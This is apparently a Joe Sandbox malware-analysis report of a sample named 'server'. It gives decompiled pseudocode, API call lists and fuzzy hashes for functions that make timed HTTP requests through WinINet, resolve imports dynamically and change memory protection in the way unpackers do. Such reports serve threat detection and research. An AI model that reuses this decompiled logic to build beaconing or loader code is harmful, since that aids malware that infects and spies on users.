            0x047e3f34
            0x047e3f3a
            0x047e3f43
            0x047e3f43
            0x047e3f54
            0x047e3f5a
            0x047e3f5a
            0x047e3f64
            0x047e3f64
            0x047e3f72
            0x047e3f72
            0x047e3f83
            0x047e3f83
            0x047e3f91
            0x047e3f91
            0x047e3fa2

            APIs
            • RtlAllocateHeap.NTDLL ref: 047E3D08
            • GetTickCount.KERNEL32 ref: 047E3D1C
            • wsprintfA.USER32 ref: 047E3D6B
            • wsprintfA.USER32 ref: 047E3D88
            • wsprintfA.USER32 ref: 047E3DA9
            • wsprintfA.USER32 ref: 047E3DC1
            • wsprintfA.USER32 ref: 047E3DE4
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E3DF4
            • wsprintfA.USER32 ref: 047E3E16
            • HeapFree.KERNEL32(00000000,00000000), ref: 047E3E26
            • wsprintfA.USER32 ref: 047E3E5E
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047E3E79
            • GetTickCount.KERNEL32 ref: 047E3E89
            • RtlEnterCriticalSection.NTDLL(054295C0), ref: 047E3E9D
            • RtlLeaveCriticalSection.NTDLL(054295C0), ref: 047E3EBB
              • Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A0
              • Part of subcall function 047E6675: lstrlen.KERNEL32(00000000,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66A8
              • Part of subcall function 047E6675: strcpy.NTDLL ref: 047E66BF
              • Part of subcall function 047E6675: lstrcat.KERNEL32(00000000,00000000), ref: 047E66CA
              • Part of subcall function 047E6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,047E3ECE,?,76B5C740,047E3ECE,00000000,05429600), ref: 047E66E7
            • StrTrimA.SHLWAPI(00000000,047E9280,00000000,05429600), ref: 047E3EED
              • Part of subcall function 047E7563: lstrlen.KERNEL32(05429BF8,00000000,00000000,00000000,047E3EF9,00000000), ref: 047E7573
              • Part of subcall function 047E7563: lstrlen.KERNEL32(?), ref: 047E757B
              • Part of subcall function 047E7563: lstrcpy.KERNEL32(00000000,05429BF8), ref: 047E758F
              • Part of subcall function 047E7563: lstrcat.KERNEL32(00000000,?), ref: 047E759A
            • lstrcpy.KERNEL32(00000000,?), ref: 047E3F0C
            • lstrcpy.KERNEL32(00000000,?), ref: 047E3F13
            • lstrcat.KERNEL32(00000000,?), ref: 047E3F20
            • lstrcat.KERNEL32(00000000,00000000), ref: 047E3F24
              • Part of subcall function 047E21A6: WaitForSingleObject.KERNEL32(00000000,746981D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 047E2258
            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 047E3F54
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047E3F64
            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,05429600), ref: 047E3F72
            • HeapFree.KERNEL32(00000000,?), ref: 047E3F83
            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 047E3F91
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
            • String ID: Uet
            • API String ID: 186568778-2766386878
            • Opcode ID: 0ae9fabf0ddc15853771668753f344dbd8932c728de9fa03d4a353ba963e46c6
            • Instruction ID: a707324ad6474496f5f762c362ec6f137146e14113e1838f5711cd38a177a49a
            • Opcode Fuzzy Hash: 0ae9fabf0ddc15853771668753f344dbd8932c728de9fa03d4a353ba963e46c6
            • Instruction Fuzzy Hash: 677193B2500205AFC711DB67EC48EE77BE8EB8C714B058B14F909DB211E639ED05DB65
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 92%
            			E047E7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
            				void _v8;
            				long _v12;
            				void _v16;
            				void* _t34;
            				void* _t38;
            				void* _t40;
            				char* _t56;
            				long _t57;
            				void* _t58;
            				intOrPtr _t59;
            				long _t65;
            
            				_t65 = __esi;
            				_t58 = __ecx;
            				_v16 = 0xea60;
            				__imp__( *(__esi + 4));
            				_v12 = __eax + __eax;
            				_t56 = E047E33DC(__eax + __eax + 1);
            				if(_t56 != 0) {
            					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
            						E047E61DA(_t56);
            					} else {
            						E047E61DA( *(__esi + 4));
            						 *(__esi + 4) = _t56;
            					}
            				}
            				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
            				 *(_t65 + 0x10) = _t34;
            				if(_t34 == 0 || InternetSetStatusCallback(_t34, E047E7B18) == 0xffffffff) {
            					L15:
            					return GetLastError();
            				} else {
            					ResetEvent( *(_t65 + 0x1c));
            					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
            					 *(_t65 + 0x14) = _t38;
            					if(_t38 != 0 || GetLastError() == 0x3e5 && E047E16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
            						_t59 =  *0x47ea348; // 0xc3d5a8
            						_t15 = _t59 + 0x47eb845; // 0x544547
            						_v8 = 0x84404000;
            						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
            						 *(_t65 + 0x18) = _t40;
            						if(_t40 == 0) {
            							goto L15;
            						}
            						_t57 = 4;
            						_v12 = _t57;
            						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
            							_v8 = _v8 | 0x00000100;
            							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
            						}
            						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
            							goto L15;
            						} else {
            							return 0;
            						}
            					} else {
            						goto L15;
            					}
            				}
            			}














            0x047e7b83
            0x047e7b83
            0x047e7b8e
            0x047e7b95
            0x047e7b9d
            0x047e7ba7
            0x047e7bad
            0x047e7bc0
            0x047e7bd0
            0x047e7bc2
            0x047e7bc5
            0x047e7bca
            0x047e7bca
            0x047e7bc0
            0x047e7be0
            0x047e7be6
            0x047e7beb
            0x047e7cd4
            0x00000000
            0x047e7c06
            0x047e7c09
            0x047e7c1c
            0x047e7c22
            0x047e7c27
            0x047e7c4f
            0x047e7c62
            0x047e7c6c
            0x047e7c6f
            0x047e7c75
            0x047e7c7a
            0x00000000
            0x00000000
            0x047e7c7e
            0x047e7c8a
            0x047e7c9b
            0x047e7c9d
            0x047e7cae
            0x047e7cae
            0x047e7cbe
            0x00000000
            0x047e7cd0
            0x00000000
            0x047e7cd0
            0x00000000
            0x00000000
            0x00000000
            0x047e7c27

            APIs
            • lstrlen.KERNEL32(?,00000008,74654D40), ref: 047E7B95
              • Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8
            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 047E7BB8
            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 047E7BE0
            • InternetSetStatusCallback.WININET(00000000,047E7B18), ref: 047E7BF7
            • ResetEvent.KERNEL32(?), ref: 047E7C09
            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 047E7C1C
            • GetLastError.KERNEL32 ref: 047E7C29
            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 047E7C6F
            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 047E7C8D
            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 047E7CAE
            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 047E7CBA
            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 047E7CCA
            • GetLastError.KERNEL32 ref: 047E7CD4
              • Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
            • String ID: @MetNet
            • API String ID: 2290446683-2109406137
            • Opcode ID: a10cd05ed42d63da97987f5fb6213ce3bd7d0bcfdfeebeb0b784cfbd962100ee
            • Instruction ID: fb46a3ce5353d8b59b7767c103e1abd918dc5c2d5ed9f3186bbd84186ac4679a
            • Opcode Fuzzy Hash: a10cd05ed42d63da97987f5fb6213ce3bd7d0bcfdfeebeb0b784cfbd962100ee
            • Instruction Fuzzy Hash: 6D417FB1500604BFDB359F67DD88EAB7BBDEB4C704B104A18F602D5290E735AA45DB20
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 147 47e6815-47e6847 memset CreateWaitableTimerA 148 47e684d-47e68a6 _allmul SetWaitableTimer WaitForMultipleObjects 147->148 149 47e69c8-47e69ce 147->149 150 47e68ac-47e68af 148->150 151 47e6930-47e6936 148->151 157 47e69d2-47e69dc 149->157 153 47e68ba 150->153 154 47e68b1 call 47e5251 150->154 155 47e6937-47e693b 151->155 156 47e68c4 153->156 163 47e68b6-47e68b8 154->163 159 47e693d-47e693f 155->159 160 47e694b-47e694f 155->160 162 47e68c8-47e68cd 156->162 159->160 160->155 161 47e6951-47e695b CloseHandle 160->161 161->157 164 47e68cf-47e68d6 162->164 165 47e68e0-47e690d call 47e35d2 162->165 163->153 163->156 164->165 166 47e68d8 164->166 169 47e690f-47e691a 165->169 170 47e695d-47e6962 165->170 166->165 169->162 173 47e691c-47e692c call 47e69e6 169->173 171 47e6964-47e696a 170->171 172 47e6981-47e6989 170->172 171->151 174 47e696c-47e697f call 47e63f6 171->174 175 47e698f-47e69bd _allmul SetWaitableTimer WaitForMultipleObjects 172->175 173->151 174->175 175->162 178 47e69c3 175->178 178->151
            C-Code - Quality: 83%
            			E047E6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
            				void _v48;
            				long _v52;
            				struct %anon52 _v60;
            				char _v72;
            				long _v76;
            				void* _v80;
            				union _LARGE_INTEGER _v84;
            				struct %anon52 _v92;
            				void* _v96;
            				void* _v100;
            				union _LARGE_INTEGER _v104;
            				long _v108;
            				struct %anon52 _v124;
            				long _v128;
            				struct %anon52 _t46;
            				void* _t51;
            				long _t53;
            				void* _t54;
            				struct %anon52 _t61;
            				long _t65;
            				struct %anon52 _t66;
            				void* _t69;
            				void* _t73;
            				signed int _t74;
            				void* _t76;
            				void* _t78;
            				void** _t82;
            				signed int _t86;
            				void* _t89;
            
            				_t76 = __edx;
            				_v52 = 0;
            				memset( &_v48, 0, 0x2c);
            				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
            				_t46 = CreateWaitableTimerA(0, 1, 0);
            				_v60 = _t46;
            				if(_t46 == 0) {
            					_v92.HighPart = GetLastError();
            				} else {
            					_push(0xffffffff);
            					_push(0xff676980);
            					_push(0);
            					_push( *0x47ea2e0);
            					_v76 = 0;
            					_v80 = 0;
            					L047E82DA();
            					_v84.LowPart = _t46;
            					_v80 = _t76;
            					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
            					_t51 =  *0x47ea30c; // 0x1ac
            					_v76 = _t51;
            					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
            					_v108 = _t53;
            					if(_t53 == 0) {
            						if(_a8 != 0) {
            							L4:
            							 *0x47ea2ec = 5;
            						} else {
            							_t69 = E047E5251(_t76); // executed
            							if(_t69 != 0) {
            								goto L4;
            							}
            						}
            						_v104.LowPart = 0;
            						L6:
            						L6:
            						if(_v104.LowPart == 1 && ( *0x47ea300 & 0x00000001) == 0) {
            							_v104.LowPart = 2;
            						}
            						_t74 = _v104.LowPart;
            						_t58 = _t74 << 4;
            						_t78 = _t89 + (_t74 << 4) + 0x38;
            						_t75 = _t74 + 1;
            						_v92.LowPart = _t74 + 1;
            						_t61 = E047E35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100);
            						_v124 = _t61;
            						if(_t61 != 0) {
            							goto L17;
            						}
            						_t66 = _v92;
            						_v104.LowPart = _t66;
            						if(_t66 != 3) {
            							goto L6;
            						} else {
            							_v124.HighPart = E047E69E6(_t75,  &_v72, _a4, _a8);
            						}
            						goto L12;
            						L17:
            						__eflags = _t61 - 0x10d2;
            						if(_t61 != 0x10d2) {
            							_push(0xffffffff);
            							_push(0xff676980);
            							_push(0);
            							_push( *0x47ea2e4);
            							goto L21;
            						} else {
            							__eflags =  *0x47ea2e8; // 0x0
            							if(__eflags == 0) {
            								goto L12;
            							} else {
            								_t61 = E047E63F6();
            								_push(0xffffffff);
            								_push(0xdc3cba00);
            								_push(0);
            								_push( *0x47ea2e8);
            								L21:
            								L047E82DA();
            								_v104.LowPart = _t61;
            								_v100 = _t78;
            								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
            								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
            								_v128 = _t65;
            								__eflags = _t65;
            								if(_t65 == 0) {
            									goto L6;
            								} else {
            									goto L12;
            								}
            							}
            						}
            						L25:
            					}
            					L12:
            					_t82 =  &_v72;
            					_t73 = 3;
            					do {
            						_t54 =  *_t82;
            						if(_t54 != 0) {
            							HeapFree( *0x47ea2d8, 0, _t54);
            						}
            						_t82 =  &(_t82[4]);
            						_t73 = _t73 - 1;
            					} while (_t73 != 0);
            					CloseHandle(_v80);
            				}
            				return _v92.HighPart;
            				goto L25;
            			}
































            0x047e6815
            0x047e682b
            0x047e682f
            0x047e6834
            0x047e683b
            0x047e6841
            0x047e6847
            0x047e69ce
            0x047e684d
            0x047e684d
            0x047e684f
            0x047e6854
            0x047e6855
            0x047e685b
            0x047e685f
            0x047e6863
            0x047e6871
            0x047e687f
            0x047e6883
            0x047e6885
            0x047e6892
            0x047e689e
            0x047e68a0
            0x047e68a6
            0x047e68af
            0x047e68ba
            0x047e68ba
            0x047e68b1
            0x047e68b1
            0x047e68b8
            0x00000000
            0x00000000
            0x047e68b8
            0x047e68c4
            0x00000000
            0x047e68c8
            0x047e68cd
            0x047e68d8
            0x047e68d8
            0x047e68e0
            0x047e68e6
            0x047e68ee
            0x047e68f7
            0x047e68fe
            0x047e6902
            0x047e6907
            0x047e690d
            0x00000000
            0x00000000
            0x047e690f
            0x047e6913
            0x047e691a
            0x00000000
            0x047e691c
            0x047e692c
            0x047e692c
            0x00000000
            0x047e695d
            0x047e695d
            0x047e6962
            0x047e6981
            0x047e6983
            0x047e6988
            0x047e6989
            0x00000000
            0x047e6964
            0x047e6964
            0x047e696a
            0x00000000
            0x047e696c
            0x047e696c
            0x047e6971
            0x047e6973
            0x047e6978
            0x047e6979
            0x047e698f
            0x047e698f
            0x047e6997
            0x047e69a5
            0x047e69a9
            0x047e69b5
            0x047e69b7
            0x047e69bb
            0x047e69bd
            0x00000000
            0x047e69c3
            0x00000000
            0x047e69c3
            0x047e69bd
            0x047e696a
            0x00000000
            0x047e6962
            0x047e6930
            0x047e6932
            0x047e6936
            0x047e6937
            0x047e6937
            0x047e693b
            0x047e6945
            0x047e6945
            0x047e694b
            0x047e694e
            0x047e694e
            0x047e6955
            0x047e6955
            0x047e69dc
            0x00000000

            APIs
            • memset.NTDLL ref: 047E682F
            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 047E683B
            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 047E6863
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 047E6883
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,047E26E9,?), ref: 047E689E
            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,047E26E9,?,00000000), ref: 047E6945
            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047E26E9,?,00000000,?,?), ref: 047E6955
            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 047E698F
            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 047E69A9
            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 047E69B5
              • Part of subcall function 047E5251: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05429218,00000000,?,746AF710,00000000,746AF730), ref: 047E52A0
              • Part of subcall function 047E5251: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05429160,?,00000000,30314549,00000014,004F0053,05429270), ref: 047E533D
              • Part of subcall function 047E5251: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,047E68B6), ref: 047E534F
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,047E26E9,?,00000000,?,?), ref: 047E69C8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
            • String ID: Uet$@MetNet
            • API String ID: 3521023985-1616585941
            • Opcode ID: 809c7e53faea5715972e870fa5611abc6c0f47efa7b1ffe437aefd15622003b2
            • Instruction ID: b76c1fb2a227ab3a9b861077995a14dc9bdaa664c1dcdeb609bf56433341c7d2
            • Opcode Fuzzy Hash: 809c7e53faea5715972e870fa5611abc6c0f47efa7b1ffe437aefd15622003b2
            • Instruction Fuzzy Hash: 5F517DB1508310AFD711AF12CC449ABBBECEB8C324F808B1EF5A5D6290D734A944CF92
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 181 47e7fc5-47e802a 182 47e802c-47e8046 RaiseException 181->182 183 47e804b-47e8075 181->183 184 47e81fb-47e81ff 182->184 185 47e807a-47e8086 183->185 186 47e8077 183->186 187 47e8088-47e8093 185->187 188 47e8099-47e809b 185->188 186->185 187->188 196 47e81de-47e81e5 187->196 189 47e8143-47e814d 188->189 190 47e80a1-47e80a8 188->190 194 47e814f-47e8157 189->194 195 47e8159-47e815b 189->195 192 47e80aa-47e80b6 190->192 193 47e80b8-47e80c5 LoadLibraryA 190->193 192->193 197 47e8108-47e8114 InterlockedExchange 192->197 193->197 198 47e80c7-47e80d7 193->198 194->195 199 47e815d-47e8160 195->199 200 47e81d9-47e81dc 195->200 205 47e81f9 196->205 206 47e81e7-47e81f4 196->206 201 47e813c-47e813d FreeLibrary 197->201 202 47e8116-47e811a 197->202 213 47e80d9-47e80e5 198->213 214 47e80e7-47e8103 RaiseException 198->214 207 47e818e-47e819c GetProcAddress 199->207 208 47e8162-47e8165 199->208 200->196 201->189 202->189 211 47e811c-47e8128 LocalAlloc 202->211 205->184 206->205 207->200 210 47e819e-47e81ae 207->210 208->207 209 47e8167-47e8172 208->209 209->207 215 47e8174-47e817a 209->215 221 47e81ba-47e81bc 210->221 222 47e81b0-47e81b8 210->222 211->189 216 47e812a-47e813a 211->216 213->197 213->214 214->184 215->207 217 47e817c-47e817f 215->217 216->189 217->207 220 47e8181-47e818c 217->220 220->200 220->207 221->200 223 47e81be-47e81d6 RaiseException 221->223 222->221 223->200
            C-Code - Quality: 51%
            			E047E7FC5(long _a4, long _a8) {
            				signed int _v8;
            				intOrPtr _v16;
            				LONG* _v28;
            				long _v40;
            				long _v44;
            				long _v48;
            				CHAR* _v52;
            				long _v56;
            				CHAR* _v60;
            				long _v64;
            				signed int* _v68;
            				char _v72;
            				signed int _t76;
            				signed int _t80;
            				signed int _t81;
            				intOrPtr* _t82;
            				intOrPtr* _t83;
            				intOrPtr* _t85;
            				intOrPtr* _t90;
            				intOrPtr* _t95;
            				intOrPtr* _t98;
            				struct HINSTANCE__* _t99;
            				void* _t102;
            				intOrPtr* _t104;
            				void* _t115;
            				long _t116;
            				void _t125;
            				void* _t131;
            				signed short _t133;
            				struct HINSTANCE__* _t138;
            				signed int* _t139;
            
            				_t139 = _a4;
            				_v28 = _t139[2] + 0x47e0000;
            				_t115 = _t139[3] + 0x47e0000;
            				_t131 = _t139[4] + 0x47e0000;
            				_v8 = _t139[7];
            				_v60 = _t139[1] + 0x47e0000;
            				_v16 = _t139[5] + 0x47e0000;
            				_v64 = _a8;
            				_v72 = 0x24;
            				_v68 = _t139;
            				_v56 = 0;
            				asm("stosd");
            				_v48 = 0;
            				_v44 = 0;
            				_v40 = 0;
            				if(( *_t139 & 0x00000001) == 0) {
            					_a8 =  &_v72;
            					RaiseException(0xc06d0057, 0, 1,  &_a8);
            					return 0;
            				}
            				_t138 =  *_v28;
            				_t76 = _a8 - _t115 >> 2 << 2;
            				_t133 =  *(_t131 + _t76);
            				_a4 = _t76;
            				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
            				_v56 = _t80;
            				_t81 = _t133 + 0x47e0002;
            				if(_t80 == 0) {
            					_t81 = _t133 & 0x0000ffff;
            				}
            				_v52 = _t81;
            				_t82 =  *0x47ea1c0; // 0x0
            				_t116 = 0;
            				if(_t82 == 0) {
            					L6:
            					if(_t138 != 0) {
            						L18:
            						_t83 =  *0x47ea1c0; // 0x0
            						_v48 = _t138;
            						if(_t83 != 0) {
            							_t116 =  *_t83(2,  &_v72);
            						}
            						if(_t116 != 0) {
            							L32:
            							 *_a8 = _t116;
            							L33:
            							_t85 =  *0x47ea1c0; // 0x0
            							if(_t85 != 0) {
            								_v40 = _v40 & 0x00000000;
            								_v48 = _t138;
            								_v44 = _t116;
            								 *_t85(5,  &_v72);
            							}
            							return _t116;
            						} else {
            							if(_t139[5] == _t116 || _t139[7] == _t116) {
            								L27:
            								_t116 = GetProcAddress(_t138, _v52);
            								if(_t116 == 0) {
            									_v40 = GetLastError();
            									_t90 =  *0x47ea1bc; // 0x0
            									if(_t90 != 0) {
            										_t116 =  *_t90(4,  &_v72);
            									}
            									if(_t116 == 0) {
            										_a4 =  &_v72;
            										RaiseException(0xc06d007f, _t116, 1,  &_a4);
            										_t116 = _v44;
            									}
            								}
            								goto L32;
            							} else {
            								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
            								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
            									_t116 =  *(_a4 + _v16);
            									if(_t116 != 0) {
            										goto L32;
            									}
            								}
            								goto L27;
            							}
            						}
            					}
            					_t98 =  *0x47ea1c0; // 0x0
            					if(_t98 == 0) {
            						L9:
            						_t99 = LoadLibraryA(_v60); // executed
            						_t138 = _t99;
            						if(_t138 != 0) {
            							L13:
            							if(InterlockedExchange(_v28, _t138) == _t138) {
            								FreeLibrary(_t138);
            							} else {
            								if(_t139[6] != 0) {
            									_t102 = LocalAlloc(0x40, 8);
            									if(_t102 != 0) {
            										 *(_t102 + 4) = _t139;
            										_t125 =  *0x47ea1b8; // 0x0
            										 *_t102 = _t125;
            										 *0x47ea1b8 = _t102;
            									}
            								}
            							}
            							goto L18;
            						}
            						_v40 = GetLastError();
            						_t104 =  *0x47ea1bc; // 0x0
            						if(_t104 == 0) {
            							L12:
            							_a8 =  &_v72;
            							RaiseException(0xc06d007e, 0, 1,  &_a8);
            							return _v44;
            						}
            						_t138 =  *_t104(3,  &_v72);
            						if(_t138 != 0) {
            							goto L13;
            						}
            						goto L12;
            					}
            					_t138 =  *_t98(1,  &_v72);
            					if(_t138 != 0) {
            						goto L13;
            					}
            					goto L9;
            				}
            				_t116 =  *_t82(0,  &_v72);
            				if(_t116 != 0) {
            					goto L33;
            				}
            				goto L6;
            			}


































            0x047e7fd4
            0x047e7fea
            0x047e7ff0
            0x047e7ff2
            0x047e7ff7
            0x047e7ffd
            0x047e8002
            0x047e8005
            0x047e8013
            0x047e801a
            0x047e801d
            0x047e8020
            0x047e8021
            0x047e8024
            0x047e8027
            0x047e802a
            0x047e802f
            0x047e803e
            0x00000000
            0x047e8044
            0x047e804e
            0x047e8058
            0x047e805d
            0x047e805f
            0x047e8069
            0x047e806c
            0x047e806f
            0x047e8075
            0x047e8077
            0x047e8077
            0x047e807a
            0x047e807d
            0x047e8082
            0x047e8086
            0x047e8099
            0x047e809b
            0x047e8143
            0x047e8143
            0x047e814a
            0x047e814d
            0x047e8157
            0x047e8157
            0x047e815b
            0x047e81d9
            0x047e81dc
            0x047e81de
            0x047e81de
            0x047e81e5
            0x047e81e7
            0x047e81f1
            0x047e81f4
            0x047e81f7
            0x047e81f7
            0x00000000
            0x047e815d
            0x047e8160
            0x047e818e
            0x047e8198
            0x047e819c
            0x047e81a4
            0x047e81a7
            0x047e81ae
            0x047e81b8
            0x047e81b8
            0x047e81bc
            0x047e81c1
            0x047e81d0
            0x047e81d6
            0x047e81d6
            0x047e81bc
            0x00000000
            0x047e8167
            0x047e816a
            0x047e8172
            0x047e8187
            0x047e818c
            0x00000000
            0x00000000
            0x047e818c
            0x00000000
            0x047e8172
            0x047e8160
            0x047e815b
            0x047e80a1
            0x047e80a8
            0x047e80b8
            0x047e80bb
            0x047e80c1
            0x047e80c5
            0x047e8108
            0x047e8114
            0x047e813d
            0x047e8116
            0x047e811a
            0x047e8120
            0x047e8128
            0x047e812a
            0x047e812d
            0x047e8133
            0x047e8135
            0x047e8135
            0x047e8128
            0x047e811a
            0x00000000
            0x047e8114
            0x047e80cd
            0x047e80d0
            0x047e80d7
            0x047e80e7
            0x047e80ea
            0x047e80fa
            0x00000000
            0x047e8100
            0x047e80e1
            0x047e80e5
            0x00000000
            0x00000000
            0x00000000
            0x047e80e5
            0x047e80b2
            0x047e80b6
            0x00000000
            0x00000000
            0x00000000
            0x047e80b6
            0x047e808f
            0x047e8093
            0x00000000
            0x00000000
            0x00000000

            APIs
            • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 047E803E
            • LoadLibraryA.KERNELBASE(?), ref: 047E80BB
            • GetLastError.KERNEL32 ref: 047E80C7
            • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 047E80FA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true
            • Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
            • Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_47e0000_server.jbxd
            Similarity
            • API ID: ExceptionRaise$ErrorLastLibraryLoad
            • String ID: $$@MetNet
            • API String ID: 948315288-3365357938
            • Opcode ID: 9433d81cc4246991f5e232cb84ade57372a3e26709f4da75feeab7ea6ffd3690
            • Instruction ID: 99e27ecaa453245e2f1b66061341b72ab893e12edb4d3351adbcd5ee65d53a59
            • Opcode Fuzzy Hash: 9433d81cc4246991f5e232cb84ade57372a3e26709f4da75feeab7ea6ffd3690
            • Instruction Fuzzy Hash: B98109B1A00605AFDB10DF9AD884BAAB7F5FB4C310F15862DE905EB340E775EA05CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 225 414000-414484 VirtualProtect
            APIs
            • VirtualProtect.KERNELBASE(02B53AE0,02B53FFC,00000040), ref: 0041447C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.523801722.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
            Joe Sandbox IDA Plugin
